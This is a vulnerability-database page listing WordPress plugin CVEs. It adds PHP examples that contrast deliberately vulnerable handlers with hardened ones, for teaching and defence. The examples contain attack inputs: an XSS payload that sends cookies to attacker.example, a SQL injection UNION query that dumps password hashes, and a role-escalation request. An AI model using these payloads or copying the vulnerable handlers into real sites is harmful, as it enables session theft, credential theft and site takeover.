
Live Vulnerability Intelligence

Threat Database

Search CVEs, inspect descriptions, and open detail pages with AI-assisted technical context.

Severity filter: High. Total 3,046 records (Critical 0, High 3,046, Medium 0). Showing 2401-2420 of 3046 records.
Threat Entry Updated 2024-11-21

CVE-2023-3136 - Mailarchiver Plugin

The MailArchiver plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

PLUGIN Mailarchiver

CVE-2023-3136

HIGH CVSS 7.2 2023-08-30
Threat Entry Updated 2024-11-21

CVE-2023-32499 - Radio Station Plugin

Unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability in the Radio Station by netmix® plugin for WordPress (Tony Zeoli, Tony Hayes; "Manage and play your Show Schedule in WordPress!").

PLUGIN Radio Station

CVE-2023-32499

HIGH CVSS 7.1 2023-08-23
Threat Entry Updated 2024-11-21

CVE-2023-1977 - Booking Manager Plugin

The Booking Manager WordPress plugin before 2.0.29 does not validate URLs entered in its admin panel or in shortcodes used to show events from a remote .ics file, allowing an attacker with privileges as low as Subscriber to perform SSRF attacks against the site's internal network.

PLUGIN Booking Manager

CVE-2023-1977

HIGH CVSS 8.8 2023-08-16
Threat Entry Updated 2024-11-21

CVE-2023-0579 - YARPP Plugin

The YARPP WordPress plugin before 5.30.3 does not validate and escape some of its shortcode attributes before using them in SQL statements, which could allow any authenticated user, such as a subscriber, to perform SQL Injection attacks.

PLUGIN YARPP

CVE-2023-0579

HIGH CVSS 8.8 2023-08-16
Threat Entry Updated 2024-11-21

CVE-2023-3958 - Wp Remote Users Sync Plugin

The WP Remote Users Sync plugin for WordPress is vulnerable to Server Side Request Forgery via the 'notify_ping_remote' AJAX function in versions up to, and including, 1.2.12. This can allow authenticated attackers with subscriber-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. This was partially patched in version 1.2.12 and fully patched in version 1.2.13.

PLUGIN Wp Remote Users Sync

CVE-2023-3958

HIGH CVSS 8.5 2023-08-16
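The pattern behind both SSRF entries above (Booking Manager's remote .ics URL and WP Remote Users Sync's 'notify_ping_remote' AJAX action), shown as an added example that is not code from either plugin: a shortcode that fetches a caller-supplied URL with no validation, beside a hardened version. It assumes WordPress is loaded (for instance as a file in wp-content/mu-plugins/); the shortcode tag, the example_* function names and the sample URLs are hypothetical.

```php
<?php
// Added example, not code from Booking Manager or WP Remote Users Sync.
// Assumes WordPress is loaded; example_* names and the shortcode tag are hypothetical.

// VULNERABLE: any user who can get this shortcode parsed (or reach the equivalent
// AJAX action) makes the server fetch a URL of their choosing, e.g.
//   [example_ics url="http://127.0.0.1:8080/admin/"]
function example_ics_shortcode_vulnerable( $atts ) {
    $atts     = shortcode_atts( array( 'url' => '' ), $atts );
    $response = wp_remote_get( $atts['url'] );               // no scheme, host or port restriction
    if ( is_wp_error( $response ) ) {
        return '';
    }
    // Output is escaped, but the request has already reached the internal host.
    return esc_html( wp_remote_retrieve_body( $response ) );
}

// wp_http_validate_url() rejects 127/8, 10/8, 0/8, 172.16/12 and 192.168/16 targets
// (unless the http_request_host_is_external filter allows the host) and ports other
// than 80/443/8080, but it does not cover 169.254/16, so the cloud metadata endpoint
// needs its own check. The hostname is resolved here and again by the HTTP client,
// so DNS rebinding between the two lookups remains a residual risk.
function example_is_link_local( $url ) {
    $host = (string) wp_parse_url( $url, PHP_URL_HOST );
    $ip   = filter_var( $host, FILTER_VALIDATE_IP ) ? $host : gethostbyname( $host );
    return 0 === strpos( $ip, '169.254.' );
}

// HARDENED: absolute http(s) URL only, validated, fetched with wp_safe_remote_get()
// (which sets reject_unsafe_urls => true), no redirects, and only the derived value
// (the event count) is returned, never the raw response body.
function example_ics_shortcode_hardened( $atts ) {
    $atts = shortcode_atts( array( 'url' => '' ), $atts );
    $url  = esc_url_raw( $atts['url'], array( 'http', 'https' ) );
    if ( '' === $url || false === wp_http_validate_url( $url ) || example_is_link_local( $url ) ) {
        return '';
    }
    $response = wp_safe_remote_get( $url, array( 'timeout' => 5, 'redirection' => 0 ) );
    if ( is_wp_error( $response ) || 200 !== (int) wp_remote_retrieve_response_code( $response ) ) {
        return '';
    }
    $events = substr_count( wp_remote_retrieve_body( $response ), 'BEGIN:VEVENT' );
    return sprintf( '<p>%d events</p>', $events );
}
add_shortcode( 'example_ics', 'example_ics_shortcode_hardened' );

// The same URL validation belongs in the admin-panel save handler and in any AJAX
// action that triggers a fetch; those additionally need a capability check
// (for example current_user_can( 'manage_options' )) so a Subscriber cannot reach
// them at all.
```

A capability check inside the shortcode callback would not help: shortcodes render in the context of whoever views the page, not whoever wrote it, so the restriction has to sit on the URL itself and on who is allowed to save it.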
Threat Entry Updated 2024-11-21

CVE-2023-2916 - Infinitewp Client Plugin

The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.11.1 via the 'admin_notice' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including configuration. It can only be exploited if the plugin has not been configured yet. If combined with another arbitrary plugin installation and activation vulnerability, it may be possible to connect a site to InfiniteWP which would make remote management possible and allow for elevation of privileges.

PLUGIN Infinitewp Client

CVE-2023-2916

HIGH CVSS 7.5 2023-08-15
Threat Entry Updated 2025-02-11

CVE-2023-4308 - User Submitted Posts Plugin

The User Submitted Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'user-submitted-content' parameter in versions up to, and including, 20230809 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

PLUGIN User Submitted Posts

CVE-2023-4308

HIGH CVSS 7.2 2023-08-15
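Both stored-XSS entries above (MailArchiver's email subject and User Submitted Posts' 'user-submitted-content') cite the same root cause, missing input sanitization and missing output escaping. The following is an added example, not code from either plugin, showing the vulnerable store/render pair and the hardened one; it assumes WordPress is loaded, and the option key, example_* function names and payload are hypothetical.

```php
<?php
// Added example, not code from MailArchiver or User Submitted Posts.
// Assumes WordPress is loaded; example_* names and the option key are hypothetical.

// Constructed input, as it would arrive in an email subject or a form field:
$example_payload = 'Invoice <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// VULNERABLE: stored as received, emitted as received. Every visitor to the page
// that shows the stored value runs the attacker's script in their own session.
function example_store_vulnerable( $subject ) {
    update_option( 'example_last_subject', $subject );
}
function example_render_vulnerable() {
    return '<h2>' . get_option( 'example_last_subject' ) . '</h2>';
}

// HARDENED, two independent layers:
//  * input: sanitize_text_field() strips tags, line breaks and control bytes before
//    storage, so the stored value for the payload above is just "Invoice";
//  * output: esc_html() encodes < > & " ' for the HTML-body context, so anything that
//    still reaches the template (older rows, other write paths) is shown, not executed.
// The escaping function must match the context: esc_attr() inside attributes,
// esc_url() in href/src, esc_js() inside inline scripts.
function example_store_hardened( $subject ) {
    update_option( 'example_last_subject', sanitize_text_field( $subject ) );
}
function example_render_hardened() {
    return '<h2>' . esc_html( get_option( 'example_last_subject' ) ) . '</h2>';
}

// Fields that legitimately carry some HTML (a user-submitted post body) are not
// escaped wholesale; they go through wp_kses_post(), which keeps the tag and
// attribute set allowed in post content and drops on* handlers, <script> and
// javascript: URLs.
function example_render_user_content( $html ) {
    return wp_kses_post( $html );
}

// Hardened round trip: the stored value is "Invoice" and the markup is "<h2>Invoice</h2>".
example_store_hardened( $example_payload );
$example_markup = example_render_hardened();
```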
Threat Entry Updated 2024-11-21

CVE-2023-4293 - Premium Packages Sell Digital Products Securely Plugin

The Premium Packages - Sell Digital Products Securely plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.7.4 due to insufficient restriction on the 'wpdmpp_update_profile' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'profile[role]' parameter during a profile update.

PLUGIN Premium Packages Sell Digital Products Securely

CVE-2023-4293

HIGH CVSS 8.8 2023-08-12
Threat Entry Updated 2024-11-21

CVE-2023-4277 - Realia Plugin

The Realia plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.0. This is due to missing nonce validation on the 'process_change_profile_form' function. This makes it possible for unauthenticated attackers to change a user's email via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.

PLUGIN Realia

CVE-2023-4277

HIGH CVSS 8.8 2023-08-10
Threat Entry Updated 2024-11-21

CVE-2023-4276 - Absolute Privacy Plugin

The Absolute Privacy plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1. This is due to missing nonce validation on the 'abpr_profileShortcode' function. This makes it possible for unauthenticated attackers to change a user's email and password via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.

PLUGIN Absolute Privacy

CVE-2023-4276

HIGH CVSS 8.8 2023-08-10
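The two CSRF entries above (Realia's 'process_change_profile_form' and Absolute Privacy's 'abpr_profileShortcode') share one defect: a profile form handler that acts on any POST without checking a nonce. The block below is an added example, not code from either plugin, placing that handler beside a nonce-protected one that also re-authenticates before changing the email. It assumes WordPress is loaded; the shortcode tag, field names and example_* functions are hypothetical.

```php
<?php
// Added example, not code from Realia or Absolute Privacy.
// Assumes WordPress is loaded; shortcode tag, field names and example_* functions are hypothetical.

// VULNERABLE: runs on any request that carries the field, including a form
// auto-submitted from an attacker's page while the victim is logged in. The auth
// cookies travel with that request; what is missing is proof it came from the
// site's own form.
function example_profile_form_vulnerable() {
    if ( isset( $_POST['email'] ) ) {
        wp_update_user( array(
            'ID'         => get_current_user_id(),
            'user_email' => sanitize_email( wp_unslash( $_POST['email'] ) ),
        ) );
    }
    return '<form method="post"><input name="email"><button>Save</button></form>';
}

// HARDENED: emit a nonce bound to the action and the current user, verify it before
// acting, and require the current password for an email change (a cross-site page
// cannot know it). A nonce is CSRF protection only, not an authorization check.
function example_profile_form_hardened() {
    if ( ! is_user_logged_in() ) {
        return '';
    }
    $user   = wp_get_current_user();
    $action = 'example_profile_' . $user->ID;

    if ( isset( $_POST['example_profile_nonce'] ) ) {
        $nonce = sanitize_text_field( wp_unslash( $_POST['example_profile_nonce'] ) );
        if ( ! wp_verify_nonce( $nonce, $action ) ) {
            wp_die( 'Invalid request.', 'Forbidden', array( 'response' => 403 ) );
        }
        $current = (string) ( $_POST['current_password'] ?? '' );
        if ( ! wp_check_password( $current, $user->user_pass, $user->ID ) ) {
            wp_die( 'Current password is wrong.', 'Forbidden', array( 'response' => 403 ) );
        }
        $email = sanitize_email( wp_unslash( $_POST['email'] ?? '' ) );
        if ( is_email( $email ) ) {
            wp_update_user( array( 'ID' => $user->ID, 'user_email' => $email ) );
        }
    }

    ob_start();
    ?>
    <form method="post">
        <?php wp_nonce_field( $action, 'example_profile_nonce' ); ?>
        <input type="email" name="email" value="<?php echo esc_attr( $user->user_email ); ?>">
        <input type="password" name="current_password" autocomplete="current-password">
        <button>Save</button>
    </form>
    <?php
    return ob_get_clean();
}
add_shortcode( 'example_profile', 'example_profile_form_hardened' );
```

WordPress nonces are tied to the logged-in user's session token and expire after a day, so a nonce captured from one victim is useless against another; they do not, however, stop an authenticated attacker from submitting their own form, which is why the handler still only edits the current user's record.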
Threat Entry Updated 2024-11-21

CVE-2023-4243 - Full Customer Plugin

The FULL - Customer plugin for WordPress is vulnerable to Arbitrary File Upload via the /install-plugin REST route in versions up to, and including, 2.2.3 due to improper authorization. This allows authenticated attackers with subscriber-level permissions and above to execute code by installing plugins from arbitrary remote locations, including non-repository sources, onto the site, provided the archive is packaged as a valid WordPress plugin.

PLUGIN Full Customer

CVE-2023-4243

HIGH CVSS 8.8 2023-08-09
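The entry above attributes the bug to improper authorization on a REST route. As an added example that is not the plugin's own code, here is a route whose permission_callback only confirms that someone is logged in, next to one gated on the 'install_plugins' capability and pinned to the WordPress.org repository. It assumes WordPress is loaded; the namespace, route names and example_* functions are hypothetical.

```php
<?php
// Added example, not code from FULL - Customer.
// Assumes WordPress is loaded; namespace, routes and example_* names are hypothetical.

// VULNERABLE: "is logged in" is authentication, not authorization. A Subscriber's
// cookie plus the X-WP-Nonce header is enough to call this and install code from
// any URL; the upgrader classes themselves perform no capability check.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/install-plugin', array(
        'methods'             => 'POST',
        'callback'            => 'example_install_plugin_vulnerable',
        'permission_callback' => function () {
            return is_user_logged_in();
        },
    ) );
} );

function example_install_plugin_vulnerable( WP_REST_Request $request ) {
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    return rest_ensure_response( $upgrader->install( $request['url'] ) ); // any zip the caller names
}

// HARDENED: require the capability WordPress itself uses for plugin installation
// (on multisite only super admins hold it, and DISALLOW_FILE_MODS turns it off
// entirely), validate the slug, and take the download URL from api.wordpress.org
// rather than from the request.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/install-plugin-hardened', array(
        'methods'             => 'POST',
        'callback'            => 'example_install_plugin_hardened',
        'permission_callback' => function () {
            return current_user_can( 'install_plugins' );
        },
        'args'                => array(
            'slug' => array(
                'required'          => true,
                'sanitize_callback' => 'sanitize_key',
                'validate_callback' => function ( $value ) {
                    return (bool) preg_match( '/^[a-z0-9-]{1,200}$/', $value );
                },
            ),
        ),
    ) );
} );

function example_install_plugin_hardened( WP_REST_Request $request ) {
    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/file.php';

    $api = plugins_api( 'plugin_information', array( 'slug' => $request['slug'] ) );
    if ( is_wp_error( $api ) ) {
        return new WP_Error( 'unknown_plugin', 'Not in the WordPress.org repository', array( 'status' => 404 ) );
    }
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $api->download_link );       // URL chosen by the repository, not the caller
    if ( is_wp_error( $result ) || ! $result ) {
        return new WP_Error( 'install_failed', 'Install failed', array( 'status' => 500 ) );
    }
    return rest_ensure_response( array( 'installed' => $request['slug'] ) );
}
```

When auditing a plugin for this class of bug, grep its register_rest_route() calls for permission_callback values of '__return_true' or is_user_logged_in() on any route that writes files, options or users.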
Threat Entry Updated 2024-11-21

CVE-2023-4239 - Real Estate Manager Plugin

The Real Estate Manager plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 6.7.1 due to insufficient restriction on the 'rem_save_profile_front' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_capabilities' parameter during a profile update.

PLUGIN Real Estate Manager

CVE-2023-4239

HIGH CVSS 8.8 2023-08-09
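Both privilege-escalation entries above (Premium Packages' 'wpdmpp_update_profile' with 'profile[role]', Real Estate Manager's 'rem_save_profile_front' with 'wp_capabilities') describe a front-end profile update that forwards whatever keys the request contains. The block below is an added example, not code from either plugin: the unfiltered handler beside one that copies only an allow-list of fields. It assumes WordPress is loaded; the AJAX action, nonce name and example_* functions are hypothetical.

```php
<?php
// Added example, not code from Premium Packages or Real Estate Manager.
// Assumes WordPress is loaded; AJAX action, nonce name and example_* functions are hypothetical.

// Constructed attacker request from a Subscriber's session:
//   POST /wp-admin/admin-ajax.php
//   action=example_update_profile&_wpnonce=...&profile[first_name]=Eve&profile[role]=administrator
// A plugin that writes meta directly would be hit with wp_capabilities[administrator]=1 instead.

// VULNERABLE: user-supplied keys reach wp_update_user() unfiltered. 'role' is a key
// it honours, so the caller chooses their own role. The nonce check is real but
// irrelevant: it proves the request came from the user's own browser, nothing more.
function example_update_profile_vulnerable() {
    check_ajax_referer( 'example_profile' );
    $profile       = isset( $_POST['profile'] ) ? (array) wp_unslash( $_POST['profile'] ) : array();
    $profile['ID'] = get_current_user_id();
    wp_update_user( $profile );
    wp_send_json_success();
}

// HARDENED: build the update array from an explicit allow-list. Neither 'role' nor
// any capability data can come from the request; role changes stay behind
// 'promote_users' in a separate administrative code path.
function example_update_profile_hardened() {
    check_ajax_referer( 'example_profile' );
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'not logged in', 401 );
    }
    $in      = isset( $_POST['profile'] ) ? (array) wp_unslash( $_POST['profile'] ) : array();
    $allowed = array( 'first_name', 'last_name', 'description', 'user_url' );
    $update  = array( 'ID' => get_current_user_id() );
    foreach ( $allowed as $key ) {
        if ( isset( $in[ $key ] ) ) {
            $update[ $key ] = ( 'user_url' === $key )
                ? esc_url_raw( $in[ $key ] )
                : sanitize_text_field( $in[ $key ] );
        }
    }
    $result = wp_update_user( $update );                      // no 'role' key can be present
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( $result->get_error_message(), 400 );
    }
    wp_send_json_success( array( 'updated' => array_keys( $update ) ) );
}
add_action( 'wp_ajax_example_update_profile', 'example_update_profile_hardened' );
```

The same rule applies to update_user_meta(): a handler that loops over $_POST and writes each key as user meta is exploitable through 'wp_capabilities' (and the table-prefixed variant on a custom prefix) exactly as through 'role'.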
Threat Entry Updated 2024-11-21

CVE-2023-2843 - Multiparcels Shipping For Woocommerce Plugin

The MultiParcels Shipping For WooCommerce WordPress plugin before 1.14.15 does not properly sanitize and escape a parameter before using it in an SQL statement, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks.

PLUGIN Multiparcels Shipping For Woocommerce

CVE-2023-2843

HIGH CVSS 8.8 2023-08-07
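The two SQL-injection entries above (YARPP's shortcode attributes, MultiParcels' unescaped parameter) both involve attacker-controlled values used in a SQL statement without preparation. The block below is an added example, not code from either plugin: a shortcode whose attribute is concatenated into a query, beside the $wpdb->prepare() version. It assumes WordPress is loaded; the shortcode tag, example_* functions and payload are hypothetical.

```php
<?php
// Added example, not code from YARPP or MultiParcels.
// Assumes WordPress is loaded; shortcode tag, example_* names and payload are hypothetical.

// Constructed attacker input, placed as a shortcode attribute by any user whose
// content the shortcode is parsed in:
//   [example_related post_type="post' UNION SELECT user_login, user_pass FROM wp_users-- "]
// The trailing "-- " comments out the rest of the original statement.
$example_attacker_post_type = "post' UNION SELECT user_login, user_pass FROM wp_users-- ";

// VULNERABLE: attributes are interpolated straight into SQL. shortcode_atts()
// supplies defaults, not safety: it passes attacker-supplied values through unchanged.
function example_related_vulnerable( $atts ) {
    global $wpdb;
    $atts = shortcode_atts( array( 'limit' => 5, 'post_type' => 'post' ), $atts );
    $sql  = "SELECT ID, post_title FROM {$wpdb->posts}
             WHERE post_type = '{$atts['post_type']}' AND post_status = 'publish'
             ORDER BY post_date DESC LIMIT {$atts['limit']}";
    return $wpdb->get_results( $sql );
}

// HARDENED: every attacker-controlled value is bound through $wpdb->prepare() with a
// typed placeholder (%s quotes and escapes, %d casts to integer), and values that
// should come from a fixed set are checked against an allow-list. Identifiers
// (table and column names) cannot be bound, so they come from $wpdb properties or
// code constants, never from input.
function example_related_hardened( $atts ) {
    global $wpdb;
    $atts  = shortcode_atts( array( 'limit' => 5, 'post_type' => 'post' ), $atts );
    $limit = min( max( absint( $atts['limit'] ), 1 ), 50 );          // clamp to a sane range
    $type  = in_array( $atts['post_type'], array( 'post', 'page' ), true ) ? $atts['post_type'] : 'post';
    $sql   = $wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts}
         WHERE post_type = %s AND post_status = 'publish'
         ORDER BY post_date DESC LIMIT %d",
        $type,
        $limit
    );
    return $wpdb->get_results( $sql );
}
add_shortcode( 'example_related', 'example_related_hardened' );
```

With the payload above, the vulnerable query returns the user table's login and password-hash columns as if they were post titles; the hardened one falls back to 'post' because the payload is not on the allow-list, and even an allow-listed value is quoted by %s.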
Threat Entry Updated 2024-11-21

CVE-2021-24916 - Qubely Plugin

The Qubely WordPress plugin before 1.8.6 allows unauthenticated users to send arbitrary e-mails to arbitrary addresses via the qubely_send_form_data AJAX action.

PLUGIN Qubely

CVE-2021-24916

HIGH CVSS 7.5 2023-08-07
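The entry above describes a contact-form AJAX action reachable without authentication that lets the caller choose the recipient. The block below is an added example, not Qubely's code, showing that handler beside one whose recipient and subject are fixed by the site, with nonce and rate limiting. It assumes WordPress is loaded; the action names, nonce action, transient key and example_* functions are hypothetical.

```php
<?php
// Added example, not code from Qubely.
// Assumes WordPress is loaded; action names, nonce action and example_* functions are hypothetical.

// Constructed unauthenticated request:
//   POST /wp-admin/admin-ajax.php
//   action=example_send_form_data&to=victim@example.net&subject=Hello&message=...
// Nothing stops a script from pushing thousands of these through the site's mail path.

// VULNERABLE: registered on wp_ajax_nopriv_ (no login needed) with recipient,
// subject and body all taken from the caller: an open mail relay.
add_action( 'wp_ajax_nopriv_example_send_form_data', 'example_send_form_vulnerable' );
add_action( 'wp_ajax_example_send_form_data',        'example_send_form_vulnerable' );
function example_send_form_vulnerable() {
    wp_mail( $_POST['to'], $_POST['subject'], $_POST['message'] );
    wp_send_json_success();
}

// HARDENED: the recipient is the site's own configured address, the submitter's
// address appears only in Reply-To, the subject is fixed, the nonce ties the request
// to a page that rendered the form, and a per-IP transient caps the volume.
add_action( 'wp_ajax_nopriv_example_send_form_data_hardened', 'example_send_form_hardened' );
add_action( 'wp_ajax_example_send_form_data_hardened',        'example_send_form_hardened' );
function example_send_form_hardened() {
    check_ajax_referer( 'example_contact_form' );

    $ip  = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '0.0.0.0';
    $key = 'example_form_' . md5( $ip );
    $n   = (int) get_transient( $key );
    if ( $n >= 5 ) {
        wp_send_json_error( 'Too many submissions', 429 );
    }
    set_transient( $key, $n + 1, 10 * MINUTE_IN_SECONDS );

    $from    = sanitize_email( wp_unslash( $_POST['email'] ?? '' ) );   // sanitize_email() drops CR/LF, so no header injection
    $message = sanitize_textarea_field( wp_unslash( $_POST['message'] ?? '' ) );
    if ( ! is_email( $from ) || '' === $message ) {
        wp_send_json_error( 'Invalid submission', 400 );
    }

    $to      = get_option( 'admin_email' );            // site-controlled recipient
    $subject = 'Contact form submission';              // fixed subject
    $headers = array( 'Reply-To: ' . $from );
    wp_mail( $to, $subject, $message, $headers );
    wp_send_json_success();
}
```

For logged-out callers a nonce is not bound to a user session, so it only proves the request was made recently by something that loaded the form; the recipient restriction is what actually closes the relay, and the rate limit is what keeps the remaining legitimate path from being abused for volume.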